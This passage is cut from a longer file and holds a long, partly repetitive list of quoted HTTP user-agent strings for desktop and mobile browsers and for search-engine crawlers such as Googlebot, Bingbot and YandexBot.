(Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) 
AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) 
Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; 
rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 